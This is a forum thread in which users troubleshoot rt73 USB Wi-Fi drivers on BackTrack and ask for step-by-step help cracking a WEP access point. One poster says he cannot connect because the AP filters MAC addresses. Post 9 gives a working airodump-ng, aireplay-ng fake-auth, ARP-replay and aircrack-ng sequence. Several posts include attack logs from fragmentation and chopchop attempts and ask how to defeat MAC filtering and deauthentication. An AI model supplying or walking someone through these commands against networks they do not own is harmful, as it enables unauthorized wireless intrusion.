1

Topic: Discussion WLAN Hacking Ubuntu

Discussion Hacking WiFi Ubuntu WEP Crack. No registration needed - but.. registered user are automaticly subscribed to the topic :) Edit: Registration required because spam. Sorry.

2

Re: Discussion WLAN Hacking Ubuntu

Hi. It's work with attack aireplay-ng 4 or 5 (korek's chopchop, fragmentation). Association need only attcak 2 and 3. Hidden ESSID it is possible uncover with tools like MDK or SKA. I think USB deivices back compat. USB 2 works with USB 1 with no problem.

3

Re: Discussion WLAN Hacking Ubuntu

thanx for your answer arestes. but i can't try aireplay-ng 4 or 5 attack because my MB K7N2 Delta-L ILSR is damage (it's support USB 1.1 if i change in BIOS setup) that make my rt73 work in my long USB cable (11 meter from my roof) with Backtrack. Exmpl for MB P4M800pro (in windows) that can be set USB 1.1 if i disable USB enhanced host controller, but i don't know how to configure USB 2.0 to USB 1.1 in Backtrack. Is there any solution so i can make airodump-ng + aireplay-ng + aircrack-ng with USB 1.1 on Backtrack?

4

Re: Discussion WLAN Hacking Ubuntu

It's recommended to put off ehnhanced usb conntroller for using packet injection with some versions of serialmonkey driver

5

Re: Discussion WLAN Hacking Ubuntu

Ou ya arestes.. Are tools like MDK or SKA work on windows XP too? Can you mention + where i can download tools to uncover Hidden ESSID and get connection to Hidden ESSID on Windows XP with ralink rt73.. Thanks for your help

6

Re: Discussion WLAN Hacking Ubuntu

Windows is operating system for painting pictures and playing games :)

7

Re: Discussion WLAN Hacking Ubuntu

Thanx for the comments, but now i desperate to try with attack aireplay-ng 4 or 5 (korek's chopchop, fragmentation) and attack 2 and 3. It's not respon and reject by Access Point, I think DARKIPUNK03 not allowed all client mac to connect but i'm not sure? Can u help n tell me anything else command one by one to crack this AP with no one client allowed to connect? If i use Kismet to get information DARKIPUNK03 AP its always constrainted by Suspicious client (probing networks but never participating) I used Backtrack 3 and notexpert. Thx for help. Screenshot
http://airdump.net/files/howtocrack.png

8

Re: Discussion WLAN Hacking Ubuntu

Hi Darkipunk. One more detail.. are you inject with right driver? After removing USB wireless device

modprobe rt73

Input device, activate interface and start mode monitor

ifconfig rausb0 up
iwconfig rausb0 mode monitor or iwpriv rausb0 rfmontx 1

To detect and display signal strenght (with loaded serialmonkey driver)

iwpriv rausb0 forceprism 1

Do you..?

9

Re: Discussion WLAN Hacking Ubuntu

Yes n3tQ. i think, i have activate monitor mode, so i can start airodump-ng,kismet.

ifconfig rausb0 up
airmon-ng start rausb0
=========================================
before, WEP key DARKIPUNK03 can be found with simple crack:

airodump-ng --channel 6 --write output --ivs rausb0
aireplay-ng --fakeauth 30 -e DARKIPUNK03 -a 00:02:6F:XX:XX:XX -h 00:C0:A8:XX:XX:XX rausb0
aireplay-ng --arpreplay -b 00:02:6F:XX:XX:XX -h 00:C0:A8:XX:XX:XX -x 512 rausb0
aircrack-ng -b 00:02:6F:XX:XX:XX output-01.ivs
screenshot

i think that WEP key can be found because i get the MAC station/clients (00:C0:A8:XX:XX:XX).but now WEP key of DARKIPUNK03 AP have change, have MAC filter, and have hidden MAC STATION/clients, but the BSSID still probing, I still confused to crack DARKIPUNK03 AP???
=======================================
I have try to fake all MAC in air near the AP, it always got reject,error:
03:43:45 Sending Authentication Request (Open System)
03:43:45 AP rejects the source MAC address (XX:XX:XX:XX:XX:XX) ?
Authentication failed (code 1)

03:54:17 Sending Authentication Request (Open System)
03:54:17 Authentication failed (code 14)

Saving chosen packet in replay_src-0402-044330.cap
04:49:44 Data packet found!
04:49:44 Sending fragmented packet
04:49:46 No answer, repeating...
04:49:46 Trying a LLC NULL packet
04:49:46 Sending fragmented packet
04:49:59 No answer, repeating...
04:50:01 Sending fragmented packet
04:50:01 Got a deauthentication packet!
04:50:06 No answer, repeating...
04:50:06 Still nothing, trying another packet...
========================================
What forceprism 1 used for, its my forceprism activate?how to activate forceprism?

========================================
I load with default driver from backtrack 3 LiveCD,rt73 its from serialmonkey too,i don't know how to install from http://rt2x00.serialmonkey.com/rt73-cvs-daily.tar.gz .i have extract to /root n try
$ cd ./rt73-cvs-YYYYMMDDHH/Module
$ make
n its always unsuccess n have error, how to install rt73-cvs-daily driver?

10

Re: Discussion WLAN Hacking Ubuntu

Where is the answer to my question.. did you modprobe rt73 ???

11

Re: Discussion WLAN Hacking Ubuntu

I don't know how to look of respon modprobe rt73 is ok,can u tell me? I have try: (sorry for the text because i don't know to orderly)

bt ~ # lsusb
Bus 4 Device 2: ID 13b1:0020 Linksys WUSB54GC 802.11g Adapter [ralink rt73]
Bus 4 Device 1: ID 0000:0000
Bus 2 Device 1: ID 0000:0000
Bus 1 Device 2: ID 062a:0000 Creative Labs
Bus 1 Device 1: ID 0000:0000
Bus 3 Device 1: ID 0000:0000

bt ~ # modprobe rt73
bt ~ # ifconfig rausb0 up
bt ~ # iwconfig rausb0 mode monitor
bt ~ # iwpriv rausb0 rfmontx 1

bt ~ # iwpriv rausb0 forceprism 1
bt ~ # iwpriv rausb0

rausb0 Available private ioctls :
set (8BE2) : set 1024 char & get 0
bbp (8BE3) : set 1024 char & get 1024 char
mac (8BE5) : set 1024 char & get 1024 char
adhocOfdm (8BE6) : set 1 int & get 0
stat (8BE9) : set 1024 char & get 1024 char
get_site_survey (8BED) : set 1024 char & get 1024 char
get_RaAP_Cfg (8BEF) : set 1024 char & get 0
forceprism (8BF0) : set 1024 char & get 0
rfmontx (8BEC) : set 1024 char & get 1 char
auth (8BE7) : set 1 int & get 0
enc (8BE8) : set 1 int & get 0
wpapsk (8BEA) : set 64 char & get 0
psm (8BEB) : set 1 int & get 0

bt ~ # modinfo rt73
filename: /lib/modules/2.6.21.5/extra/rt73.ko
license: GPL
description: Ralink RT73 802.11abg WLAN Driver k2wrlz modifications 2.0.0
author: http://rt2x00.serialmonkey.com
alias: usb:v13B1p0023d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DF6p90ACd*dc*dsc*dp*ic*isc*ip*
alias: usb:v1690p0722d*dc*dsc*dp*ic*isc*ip*
alias: usb:v06F8pE010d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DF6p9712d*dc*dsc*dp*ic*isc*ip*
alias: usb:v18E8p6196d*dc*dsc*dp*ic*isc*ip*
alias: usb:v13B1p0020d*dc*dsc*dp*ic*isc*ip*
alias: usb:v050Dp705Ad*dc*dsc*dp*ic*isc*ip*
alias: usb:v050Dp7050d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07D1p3C04d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07D1p3C03d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1044p800Ad*dc*dsc*dp*ic*isc*ip*
alias: usb:v1631pC019d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1371p9032d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1371p9022d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1472p0009d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0769p31F3d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07B8pB21Dd*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DB0pA861d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DB0pA874d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DB0p6877d*dc*dsc*dp*ic*isc*ip*
alias: usb:v14B2p3C22d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1044p8008d*dc*dsc*dp*ic*isc*ip*
alias: usb:v18E8p6229d*dc*dsc*dp*ic*isc*ip*
alias: usb:v18E8p6196d*dc*dsc*dp*ic*isc*ip*
alias: usb:v148Fp2671d*dc*dsc*dp*ic*isc*ip*
alias: usb:v148Fp2573d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0B05p1723d*dc*dsc*dp*ic*isc*ip*
depends:
vermagic: 2.6.21.5 SMP mod_unload 486
parm: debug:Enable debug, accepted values: 0 (no debug, default), 1 (Trace), 2 (Info). (int)

I got problem if i want to install rt73 driver from serialmonkey, i try like this:

bt ~ # cd rt73-cvs-2008040114

bt rt73-cvs-2008040114 # cd Module/

bt Module # make
make: *** /lib/modules/2.6.21.5/build: No such file or directory. Stop.
rt73.ko failed to build!
make: *** [module] Error 1

bt Module # makefile
-bash: makefile: command not found

bt Module # dir
CVS/ connect.c oid.h rtmp.h rtmp_type.h sync.c
Makefile iwpriv_usage.txt rt2x00debug.c rtmp_def.h rtmp_wep.c wpa.c
TESTING md5.c rt2x00debug.h rtmp_info.c rtusb_bulk.c wpa.h
assoc.c md5.h rt73.bin rtmp_init.c rtusb_data.c
auth.c mlme.c rt73.h rtmp_main.c rtusb_io.c
auth_rsp.c mlme.h rt_config.h rtmp_tkip.c sanity.c

please help me..

12

Re: Discussion WLAN Hacking Ubuntu

Hi man, this is never ending story.. I think 'll be better (and quick) you come into our IRC channel to pow wow about modprobe rt73.

13

Re: Discussion WLAN Hacking Ubuntu

But does this require that the passphrase be a dictionary phrase, or a combo of words found in the dictionary?

14

Re: Discussion WLAN Hacking Ubuntu

Thanx for help me in IRC channel, but now I can't find airdump.net channel. I "got a deauth/disassoc packet. Is the source MAC associated?". Can i resolve this distracter, it's the deauth from the Suspicious client?

15

Re: Discussion WLAN Hacking Ubuntu

darkupunk I think can'nt understand your question.

16

Re: Discussion WLAN Hacking Ubuntu

sorry with my english n3tQ :) is there any app for find valid Authentication clients on AP, because i always got a deauth/disassoc packet when i running all attack mode with fake mac clients which show in kismet (because i can't see clients of AP on airodump-ng)if i have catch 1 ARP i always got a deauth/disassoc, can i resolve it?
some with attack say;

Saving chosen packet in replay_src-0418-113957.cap
11:40:02 Data packet found!
11:40:02 Sending fragmented packet
11:40:02 Got a deauthentication packet!
---
07:19:34 AP rejects the source MAC address (00:02:6F:XX:XX:XX) ?
Authentication failed (code 1)
---
11:33:31.416337 Retry 213us BSSID:00:02:6f:XX:XX:XX DA:00:02:6f:XX:XX:XX SA:00:0
2:6f:XX:XX:XX DeAuthentication: Class 2 frame received from nonauthenticated sta
tion

n3tQ why if i runing airoscript 6,7,8,9,10 always fail it not show respon from aireplay-ng?

6) Chopchop attack
7) Chopchop attack using a client
8) Solo interactive attack (attempt to jump start stalled injections)
9) Chopchop attack injection part of the attack
10) Chopchop attack using a client injection part of the attack